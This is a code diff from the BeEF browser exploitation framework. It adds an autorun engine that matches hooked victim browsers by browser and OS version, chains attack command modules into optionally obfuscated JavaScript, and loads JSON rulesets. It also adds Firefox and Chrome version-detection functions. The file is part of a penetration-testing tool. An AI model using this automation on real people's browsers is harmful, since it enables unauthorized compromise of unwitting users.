@VERSION = ['<','<=','==','>=','>','ALL']
@VERSION_STR = ['XP','Vista']
end
# Prepare and return the JavaScript of the modules to be sent.
# It also updates the rules ARE execution table with timings
def trigger(rule_ids, hb_id)
hb = BeEF::HBManager.get_by_id(hb_id)
hb_session = hb.session
rule_ids.each do |rule_id|
rule = BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)
modules = JSON.parse(rule.modules)
execution_order = JSON.parse(rule.execution_order)
execution_delay = JSON.parse(rule.execution_delay)
chain_mode = rule.chain_mode
mods_bodies = Array.new
mods_codes = Array.new
mods_conditions = Array.new
modules.each do |cmd_mod|
mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
options = []
replace_input = false
cmd_mod['options'].each do|k,v|
options.push({'name' => k, 'value' => v})
replace_input = true if v == '<<mod_input>>'
end
command_body = prepare_command(mod, options, hb_id, replace_input)
mods_bodies.push(command_body)
mods_codes.push(cmd_mod['code'])
mods_conditions.push(cmd_mod['condition'])
end
# Depending on the chosen chain mode (sequential or nested/forward), prepare the appropriate wrapper
case chain_mode
when 'nested-forward'
wrapper = prepare_nested_forward_wrapper(mods_bodies, mods_codes, mods_conditions, execution_order)
when 'sequential'
wrapper = prepare_sequential_wrapper(mods_bodies, execution_order, execution_delay)
else
wrapper = nil
# TODO catch error, which should never happen as values are checked way before ;-)
end
are_exec = BeEF::Core::AutorunEngine::Models::Execution.new(
:session => hb_session,
:mod_count => modules.length,
:mod_successful => 0,
:mod_body => wrapper,
:is_sent => false,
:rule_id => rule_id
)
are_exec.save
# Once Engine.check() verified that the hooked browser match a Rule, trigger the Rule ;-)
print_more "Triggering ruleset #{rule_ids.to_s} on HB #{hb_id}"
end
end
# Wraps module bodies in their own function, using setTimeout to trigger them with an eventual delay.
# Launch order is also taken care of.
# - sequential chain with delays (setTimeout stuff)
# ex.: setTimeout(module_one(), 0);
# setTimeout(module_two(), 2000);
# setTimeout(module_three(), 3000);
# Note: no result status is checked here!! Useful if you just want to launch a bunch of modules without caring
# what their status will be (for instance, a bunch of XSRFs on a set of targets)
def prepare_sequential_wrapper(mods, order, delay)
wrapper = ''
delayed_exec = ''
c = 0
while c < mods.length
delayed_exec += %Q| setTimeout("#{mods[order[c]][:mod_name]}();", #{delay[c]}); |
wrapped_mod = "#{mods[order[c]][:mod_body]}\n"
wrapper += wrapped_mod
c += 1
end
wrapper += delayed_exec
print_more "Final Modules Wrapper:\n #{delayed_exec}" if @debug_on
wrapper
end
# Wraps module bodies in their own function, then start to execute them from the first, polling for
# command execution status/results (with configurable polling interval and timeout).
# Launch order is also taken care of.
# - nested forward chain with status checks (setInterval to wait for command to return from async operations)
# ex.: module_one()
# if condition
# module_two(module_one_output)
# if condition
# module_three(module_two_output)
#
# Note: command result status is checked, and you can properly chain input into output, having also
# the flexibility of slightly mangling it to adapt to module needs.
# Note: Useful in situations where you want to launch 2 modules, where the second one will execute only
# if the first once return with success. Also, the second module has the possibility of mangling first
# module output and use it as input for some of its module inputs.
def prepare_nested_forward_wrapper(mods, code, conditions, order)
wrapper, delayed_exec = '',''
delayed_exec_footers = Array.new
c = 0
while c < mods.length
if mods.length == 1
i = c
else
i = c + 1
end
code_snippet = ''
mod_input = ''
if code[c] != 'null' && code[c] != ''
code_snippet = code[c]
mod_input = 'mod_input'
end
conditions[i] = true if conditions[i] == nil || conditions[i] == ''
if c == 0
# this is the first wrapper to prepare
delayed_exec += %Q|
function #{mods[order[c]][:mod_name]}_f(){
#{mods[order[c]][:mod_name]}();
// TODO add timeout to prevent infinite loops
function isResReady(mod_result, start){
if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
// loop
}else{
// module return status/data is now available
clearInterval(resultReady);
if (mod_result === null && #{@continue_after_timeout}){
var mod_result = [];
mod_result[0] = 1; //unknown status
mod_result[1] = '' //empty result
}
var status = mod_result[0];
if(#{conditions[i]}){
#{mods[order[i]][:mod_name]}_can_exec = true;
#{mods[order[c]][:mod_name]}_mod_output = mod_result[1];
|
delayed_exec_footer = %Q|
}
}
}
var start = (new Date()).getTime();
var resultReady = setInterval(function(){var start = (new Date()).getTime(); isResReady(#{mods[order[c]][:mod_name]}_mod_output, start);},#{@result_poll_interval});
}
#{mods[order[c]][:mod_name]}_f();
|
delayed_exec_footers.push(delayed_exec_footer)
elsif c < mods.length - 1
# this is one of the wrappers in the middle of the chain
delayed_exec += %Q|
function #{mods[order[c]][:mod_name]}_f(){
if(#{mods[order[c]][:mod_name]}_can_exec){
#{code_snippet}
#{mods[order[c]][:mod_name]}(#{mod_input});
function isResReady(mod_result, start){
if (mod_result === null && parseInt(((new Date().getTime()) - start)) < #{@result_poll_timeout}){
// loop
}else{
// module return status/data is now available
clearInterval(resultReady);
if (mod_result === null && #{@continue_after_timeout}){
var mod_result = [];
mod_result[0] = 1; //unknown status
mod_result[1] = '' //empty result
}
var status = mod_result[0];
if(#{conditions[i]}){
#{mods[order[i]][:mod_name]}_can_exec = true;
#{mods[order[c]][:mod_name]}_mod_output = mod_result[1];
|
delayed_exec_footer = %Q|
}
}
}
var start = (new Date()).getTime();
var resultReady = setInterval(function(){ isResReady(#{mods[order[c]][:mod_name]}_mod_output, start);},#{@result_poll_interval});
}
}
#{mods[order[c]][:mod_name]}_f();
|
delayed_exec_footers.push(delayed_exec_footer)
else
# this is the last wrapper to prepare
delayed_exec += %Q|
function #{mods[order[c]][:mod_name]}_f(){
if(#{mods[order[c]][:mod_name]}_can_exec){
#{code_snippet}
#{mods[order[c]][:mod_name]}(#{mod_input});
}
}
#{mods[order[c]][:mod_name]}_f();
|
end
wrapped_mod = "#{mods[order[c]][:mod_body]}\n"
wrapper += wrapped_mod
c += 1
end
wrapper += delayed_exec + delayed_exec_footers.reverse.join("\n")
print_more "Final Modules Wrapper:\n #{delayed_exec + delayed_exec_footers.reverse.join("\n")}" if @debug_on
wrapper
end
# prepare the command module (compiling the Erubis templating stuff), eventually obfuscate it,
# and store it in the database.
# Returns the raw module body after template substitution.
def prepare_command(mod, options, hb_id, replace_input)
config = BeEF::Core::Configuration.instance
begin
command = BeEF::Core::Models::Command.new(
:data => options.to_json,
:hooked_browser_id => hb_id,
:command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod.name}.db.id"),
:creationdate => Time.new.to_i,
:instructions_sent => true
)
command.save
command_module = BeEF::Core::Models::CommandModule.first(:id => mod.id)
if (command_module.path.match(/^Dynamic/))
# metasploit and similar integrations
command_module = BeEF::Modules::Commands.const_get(command_module.path.split('/').last.capitalize).new
else
# normal modules always here
key = BeEF::Module.get_key_by_database_id(mod.id)
command_module = BeEF::Core::Command.const_get(config.get("beef.module.#{key}.class")).new(key)
end
hb = BeEF::HBManager.get_by_id(hb_id)
hb_session = hb.session
command_module.command_id = command.id
command_module.session_id = hb_session
command_module.build_datastore(command.data)
command_module.pre_send
build_missing_beefjs_components(command_module.beefjs_components) unless command_module.beefjs_components.empty?
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
command_body = evasion.obfuscate(command_module.output) + "\n\n"
else
command_body = command_module.output + "\n\n"
end
# @note prints the event to the console
print_more "Preparing JS for command id [#{command.id}], module [#{mod.name}]"
replace_input ? mod_input = 'mod_input' : mod_input = ''
result = %Q|
var #{mod.name} = function(#{mod_input}){
#{clean_command_body(command_body, replace_input)}
};
var #{mod.name}_can_exec = false;
var #{mod.name}_mod_output = null;
|
return {:mod_name => mod.name, :mod_body => result}
rescue => e
print_error e.message
print_debug e.backtrace.join("\n")
end
end
# Removes the beef.execute wrapper in order that modules are executed in the ARE wrapper, rather than
# using the default behavior of adding the module to an array and execute it at polling time.
#
# Also replace <<mod_input>> with mod_input variable if needed for chaining module output/input
def clean_command_body(command_body, replace_input)
begin
cmd_body = command_body.lines.map(&:chomp)
wrapper_start_index,wrapper_end_index = nil
cmd_body.each_with_index do |line, index|
if line.include?('beef.execute(function()')
wrapper_start_index = index
break
end
end
cmd_body.reverse.each_with_index do |line, index|
if line.include?('});')
wrapper_end_index = index
break
end
end
cleaned_cmd_body = cmd_body.slice(wrapper_start_index+1..-(wrapper_end_index+2)).join("\n")
# check if <<mod_input>> should be replaced with a variable name (depending if the variable is a string or number)
if replace_input
if cleaned_cmd_body.include?('"<<mod_input>>"')
final_cmd_body = cleaned_cmd_body.gsub('"<<mod_input>>"','mod_input')
elsif cleaned_cmd_body.include?('\'<<mod_input>>\'')
final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
elsif cleaned_cmd_body.include?('<<mod_input>>')
final_cmd_body = cleaned_cmd_body.gsub('\'<<mod_input>>\'','mod_input')
else
return cleaned_cmd_body
end
return final_cmd_body
else
return cleaned_cmd_body
end
rescue => e
print_error "[ARE] There is likely a problem with the module's command.js parsing. Check Engine.clean_command_body.dd"
end
end
# Checks if there are any ARE rules to be triggered for the specified hooked browser
#
# Note: browser version checks are supporting only major versions, ex: C 43, IE 11
# Note: OS version checks are supporting major/minor versions, ex: OSX 10.10, Windows 8.1
#
# Returns an array with rule IDs that matched and should be triggered.
# if rule_id is specified, checks will be executed only against the specified rule (useful
# for dynamic triggering of new rulesets ar runtime)
def match(browser, browser_version, os, os_version, rule_id=nil)
match_rules = []
if rule_id != nil
rules = [BeEF::Core::AutorunEngine::Models::Rule.get(rule_id)]
else
rules = BeEF::Core::AutorunEngine::Models::Rule.all()
end
return nil if rules == nil
print_info "[ARE] Checking if any defined rules should be triggered on target."
# TODO handle cases where there are multiple ARE rules for the same hooked browser.
# TODO the above works well, but maybe rules need to have priority or something?
rules.each do |rule|
begin
browser_match, os_match = false, false
b_ver_cond = rule.browser_version.split(' ').first
b_ver = rule.browser_version.split(' ').last
os_ver_rule_cond = rule.os_version.split(' ').first
os_ver_rule_maj = rule.os_version.split(' ').last.split('.').first
os_ver_rule_min = rule.os_version.split(' ').last.split('.').last
# Most of the times Linux/*BSD OS doesn't return any version
# (TODO: improve OS detection on these operating systems)
if os_version != nil && !@VERSION_STR.include?(os_version)
os_ver_hook_maj = os_version.split('.').first
os_ver_hook_min = os_version.split('.').last
# the following assignments to 0 are need for later checks like:
# 8.1 >= 7, because if the version doesn't have minor versions, maj/min are the same
os_ver_hook_min = 0 if os_version.split('.').length == 1
os_ver_rule_min = 0 if rule.os_version.split('.').length == 1
else
# most probably Windows XP or Vista. the following is a hack as Microsoft had the brilliant idea
# to switch from strings to numbers in OS versioning. To prevent rewriting code later on,
# we say that XP is Windows 5.0 and Vista is Windows 6.0. Easier for comparison later on.
os_ver_hook_maj, os_ver_hook_min = 5, 0 if os_version == 'XP'
os_ver_hook_maj, os_ver_hook_min = 6, 0 if os_version == 'Vista'
end
os_ver_rule_maj, os_ver_rule_min = 5, 0 if os_ver_rule_maj == 'XP'
os_ver_rule_maj, os_ver_rule_min = 6, 0 if os_ver_rule_maj == 'Vista'
next unless @VERSION.include?(b_ver_cond)
next unless BeEF::Filters::is_valid_browserversion?(b_ver)
next unless @VERSION.include?(os_ver_rule_cond) || @VERSION_STR.include?(os_ver_rule_cond)
# os_ver without checks as it can be very different or even empty, for instance on linux/bsd)
# check if the browser and OS types do match
next unless rule.browser == 'ALL' || browser == rule.browser
next unless rule.os == 'ALL' || os == rule.os
# check if the browser version match
browser_version_match = compare_versions(browser_version.to_s, b_ver_cond, b_ver.to_s)
if browser_version_match
browser_match = true
else
browser_match = false
end
print_more "Browser version check -> (hook) #{browser_version} #{rule.browser_version} (rule) : #{browser_version_match}"
# check if the OS versions match
if os_version != nil || rule.os_version != 'ALL'
os_major_version_match = compare_versions(os_ver_hook_maj.to_s, os_ver_rule_cond, os_ver_rule_maj.to_s)
os_minor_version_match = compare_versions(os_ver_hook_min.to_s, os_ver_rule_cond, os_ver_rule_min.to_s)
else
# os_version_match = true if (browser doesn't return an OS version || rule OS version is ALL )
os_major_version_match, os_minor_version_match = true, true
end
os_match = true if os_ver_rule_cond == 'ALL' || (os_major_version_match && os_minor_version_match)
print_more "OS version check -> (hook) #{os_version} #{rule.os_version} (rule): #{os_major_version_match && os_minor_version_match}"
if browser_match && os_match
print_more "Hooked browser and OS type/version MATCH rule: #{rule.name}."
match_rules.push(rule.id)
end
rescue => e
print_error e.message
print_debug e.backtrace.join("\n")
end
end
print_more "Found [#{match_rules.length}/#{rules.length}] ARE rules matching the hooked browser type/version."
return match_rules
end
# compare versions
def compare_versions(ver_a, cond, ver_b)
return true if cond == 'ALL'
return true if cond == '==' && ver_a == ver_b
return true if cond == '<=' && ver_a <= ver_b
return true if cond == '<' && ver_a < ver_b
return true if cond == '>=' && ver_a >= ver_b
return true if cond == '>' && ver_a > ver_b
return false
end
end
end
end
end

30
core/main/autorun_engine/models/execution.rb Normal file
View File

@@ -0,0 +1,30 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
module Models
# @note Stored info about the execution of the ARE on hooked browsers.
class Execution
include DataMapper::Resource
storage_names[:default] = 'core_areexecution'
property :id, Serial
property :session, Text # hooked browser session where a ruleset triggered
property :mod_count, Integer # number of command modules of the ruleset
property :mod_successful, Integer # number of command modules that returned with success
# By default Text is only 65K, so field length increased to 1 MB
property :mod_body, Text, :length => 1024000 # entire command module(s) body to be sent
property :exec_time, String, :length => 15 # timestamp of ruleset triggering
property :is_sent, Boolean
end
end
end
end
end

34
core/main/autorun_engine/models/rule.rb Normal file
View File

@@ -0,0 +1,34 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
module Models
# @note Table stores the rules for the Distributed Engine.
class Rule
include DataMapper::Resource
storage_names[:default] = 'core_arerules'
property :id, Serial
property :name, Text # rule name
property :author, String # rule author
property :browser, String, :length => 10 # browser name
property :browser_version, String, :length => 15 # browser version
property :os, String, :length => 10 # OS name
property :os_version, String, :length => 15 # OS version
property :modules, Text # JSON stringyfied representation of the JSON rule for further parsing
property :execution_order, Text # command module execution order
property :execution_delay, Text # command module time delays
property :chain_mode, String, :length => 40 # rule chaining mode
has n, :executions
end
end
end
end
end

82
core/main/autorun_engine/parser.rb Normal file
View File

@@ -0,0 +1,82 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
class Parser
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
end
BROWSER = ['FF','C','IE','S','O','ALL']
OS = ['Linux','Windows','OSX','Android','iOS','BlackBerry','ALL']
VERSION = ['<','<=','==','>=','>','ALL','Vista','XP']
CHAIN_MODE = ['sequential','nested-forward']
MAX_VER_LEN = 15
# Parse a JSON ARE file and returns an Hash with the value mappings
def parse(name,author,browser, browser_version, os, os_version, modules, exec_order, exec_delay, chain_mode)
begin
success = [true]
return [false, 'Illegal chain_mode definition'] unless CHAIN_MODE.include?(chain_mode)
return [false, 'Illegal rule name'] unless BeEF::Filters.is_non_empty_string?(name)
return [false, 'Illegal author name'] unless BeEF::Filters.is_non_empty_string?(author)
return [false, 'Illegal browser definition'] unless BROWSER.include?(browser)
if browser_version != 'ALL'
return [false, 'Illegal browser_version definition'] unless
VERSION.include?(browser_version[0,2].gsub(/\s+/,'')) &&
BeEF::Filters::is_valid_browserversion?(browser_version[2..-1].gsub(/\s+/,'')) && browser_version.length < MAX_VER_LEN
end
if os_version != 'ALL'
return [false, 'Illegal os_version definition'] unless
VERSION.include?(os_version[0,2].gsub(/\s+/,'')) &&
BeEF::Filters::is_valid_osversion?(os_version[2..-1].gsub(/\s+/,'')) && os_version.length < MAX_VER_LEN
end
return [false, 'Illegal os definition'] unless OS.include?(os)
# check if module names, conditions and options are ok
modules.each do |cmd_mod|
mod = BeEF::Core::Models::CommandModule.first(:name => cmd_mod['name'])
if mod != nil
modk = BeEF::Module.get_key_by_database_id(mod.id)
mod_options = BeEF::Module.get_options(modk)
opt_count = 0
mod_options.each do |opt|
if opt['name'] == cmd_mod['options'].keys[opt_count]
opt_count += 1
else
return [false, "The specified option (#{cmd_mod['options'].keys[opt_count]
}) for module (#{cmd_mod['name']}) does not exist"]
end
end
else
return [false, "The specified module name (#{cmd_mod['name']}) does not exist"]
end
end
exec_order.each{ |order| return [false, 'execution_order values must be Integers'] unless order.integer?}
exec_delay.each{ |delay| return [false, 'execution_delay values must be Integers'] unless delay.integer?}
success
rescue => e
print_error "#{e.message}"
print_debug "#{e.backtrace.join("\n")}"
return [false, 'Something went wrong.']
end
end
end
end
end
end

95
core/main/autorun_engine/rule_loader.rb Normal file
View File

@@ -0,0 +1,95 @@
#
# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module AutorunEngine
class RuleLoader
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
end
# this expects parsed JSON as input
def load(data)
begin
name = data['name']
author = data['author']
browser = data['browser']||'ALL'
browser_version = data['browser_version']||'ALL'
os = data['os']||'ALL'
os_version = data['os_version']||'ALL'
modules = data['modules']
exec_order = data['execution_order']
exec_delay = data['execution_delay']
chain_mode = data['chain_mode']
parser_result = BeEF::Core::AutorunEngine::Parser.instance.parse(
name,author,browser,browser_version,os,os_version,modules,exec_order,exec_delay,chain_mode)
if parser_result.length == 1 && parser_result.first
print_info "[ARE] Ruleset (#{name}) parsed and stored successfully."
print_more "Target Browser: #{browser} (#{browser_version})"
print_more "Target OS: #{os} (#{os_version})"
print_more "Modules to Trigger:"
modules.each do |mod|
print_more "(*) Name: #{mod['name']}"
print_more "(*) Condition: #{mod['condition']}"
print_more "(*) Code: #{mod['code']}"
print_more "(*) Options:"
mod['options'].each do |key,value|
print_more "\t#{key}: (#{value})"
end
end
print_more "Exec order: #{exec_order}"
print_more "Exec delay: #{exec_delay}"
are_rule = BeEF::Core::AutorunEngine::Models::Rule.new(
:name => name,
:author => author,
:browser => browser,
:browser_version => browser_version,
:os => os,
:os_version => os_version,
:modules => modules.to_json,
:execution_order => exec_order,
:execution_delay => exec_delay,
:chain_mode => chain_mode)
are_rule.save
return { 'success' => true, 'rule_id' => are_rule.id}
else
print_error "[ARE] Ruleset (#{name}): ERROR. " + parser_result.last
return { 'success' => false, 'error' => parser_result.last }
end
rescue => e
err = 'Malformed JSON ruleset.'
print_error "[ARE] Ruleset (#{name}): ERROR. #{e} #{e.backtrace}"
return { 'success' => false, 'error' => err }
end
end
def load_file(json_rule_path)
begin
rule_file = File.open(json_rule_path, 'r:UTF-8', &:read)
self.load JSON.parse(rule_file)
rescue => e
print_error "[ARE] Failed to load ruleset from #{json_rule_path}"
end
end
def load_directory
Dir.glob("#{$root_dir}/arerules/enabled/**/*.json") do |rule|
print_info "[ARE] Processing rule: #{rule}"
self.load_file rule
end
end
end
end
end
end

43
core/main/client/are.js
View File

@@ -5,43 +5,14 @@
//
beef.are = {
init:function(){
var Jools = require('jools');
this.ruleEngine = new Jools();
status_success: function(){
return 1;
},
send:function(module){
// there will probably be some other stuff here before things are finished
this.commands.push(module);
status_unknown: function(){
return 0;
},
execute:function(inputs){
this.rulesEngine.execute(input);
},
cache_modules:function(modules){},
rules:[
{
'name':"exec_no_input",
'condition':function(command,browser){
//need to figure out how to handle the inputs
return (!command['inputs'] || command['inputs'].length == 0)
},
'consequence':function(command,browser){}
},
{
'name':"module_has_sibling",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
},
{
'name':"module_depends_on_module",
'condition':function(command,commands){
return false;
},
'consequence':function(command,commands){}
}
],
commands:[],
results:[]
status_error: function(){
return -1;
}
};
beef.regCmp("beef.are");

344
core/main/client/browser.js
View File

@@ -381,13 +381,76 @@ beef.browser = {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/35./) != null;
},
/**
* Returns true if FF36
* @example: beef.browser.isFF36()
*/
isFF36: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/36./) != null;
},
/**
* Returns true if FF37
* @example: beef.browser.isFF37()
*/
isFF37: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/37./) != null;
},
/**
* Returns true if FF38
* @example: beef.browser.isFF38()
*/
isFF38: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/38./) != null;
},
/**
* Returns true if FF39
* @example: beef.browser.isFF39()
*/
isFF39: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/39./) != null;
},
/**
* Returns true if FF40
* @example: beef.browser.isFF40()
*/
isFF40: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/40./) != null;
},
/**
* Returns true if FF41
* @example: beef.browser.isFF41()
*/
isFF41: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/41./) != null;
},
/**
* Returns true if FF42
* @example: beef.browser.isFF42()
*/
isFF42: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/42./) != null;
},
/**
* Returns true if FF43
* @example: beef.browser.isFF43()
*/
isFF43: function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && typeof String.prototype.codePointAt === 'function' && typeof Number.isSafeInteger === 'function' && window.navigator.userAgent.match(/Firefox\/43./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF: function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27() || this.isFF28() || this.isFF29() || this.isFF30() || this.isFF31() || this.isFF32() || this.isFF33() || this.isFF34() || this.isFF35() || this.isFF36() || this.isFF37() || this.isFF38() || this.isFF39() || this.isFF40() || this.isFF41() || this.isFF42() || this.isFF43();
},
/**
@@ -886,13 +949,120 @@ beef.browser = {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 39) ? true : false);
},
/**
* Returns true if Chrome 40.
* @example: beef.browser.isC40()
*/
isC40: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 40) ? true : false);
},
/**
* Returns true if Chrome for iOS 40.
* @example: beef.browser.isC40iOS()
*/
isC40iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 40) ? true : false);
},
/**
* Returns true if Chrome 41.
* @example: beef.browser.isC41()
*/
isC41: function () {
return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 41) ? true : false);
},
/**
* Returns true if Chrome for iOS 41.
* @example: beef.browser.isC41iOS()
*/
isC41iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 41) ? true : false);
},
/**
* Returns true if Chrome 42.
* @example: beef.browser.isC42()
*/
isC42: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 42) ? true : false);
},
/**
* Returns true if Chrome for iOS 42.
* @example: beef.browser.isC42iOS()
*/
isC42iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 42) ? true : false);
},
/**
* Returns true if Chrome 43.
* @example: beef.browser.isC43()
*/
isC43: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 43) ? true : false);
},
/**
* Returns true if Chrome for iOS 43.
* @example: beef.browser.isC43iOS()
*/
isC43iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 43) ? true : false);
},
/**
* Returns true if Chrome 44.
* @example: beef.browser.isC44()
*/
isC44: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 44) ? true : false);
},
/**
* Returns true if Chrome for iOS 44.
* @example: beef.browser.isC44iOS()
*/
isC44iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 44) ? true : false);
},
/**
* Returns true if Chrome 45.
* @example: beef.browser.isC45()
*/
isC45: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 45) ? true : false);
},
/**
* Returns true if Chrome 46.
* @example: beef.browser.isC46()
*/
isC46: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 46) ? true : false);
},
isC47: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 47) ? true : false);
},
/**
* Returns true if Chrome for iOS 45.
* @example: beef.browser.isC45iOS()
*/
isC45iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 45) ? true : false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function () {
